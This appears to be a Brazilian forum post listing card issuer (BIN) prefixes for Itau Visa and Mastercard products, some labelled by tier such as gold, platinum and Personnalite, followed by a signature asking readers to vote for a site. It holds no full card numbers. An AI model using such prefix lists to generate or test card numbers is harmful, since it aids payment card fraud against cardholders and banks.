438012
438013
438014
438015
438016
438017
438018
438019
438020
438021
438022
438023
438024
438025
438026
438027
438028
438029
438030
438031
438032
438033
438034
438035
438036
438037
438038
438039
449138
448543
451135
450857
451476
4380
4096
4011
4118
4931
4532
4551
4532 gold
4565
4066 - prime
4056 - PLATINUM IN VERITAS
492052

Itau

Master Card

5493
5390
5364
539059
544859
546452
518491
549359
536358
536358
536367
552072 Personnalite
536371
536377
536380
536381
536382
536391
536452
536458
536467
536471

_________________

"Por favor n�o deixe de votar no site preciso realmente dos votos, eu sei que
gastara 1 minuto a + do seu precioso tempo, mas eu realmente preciso muito!!!".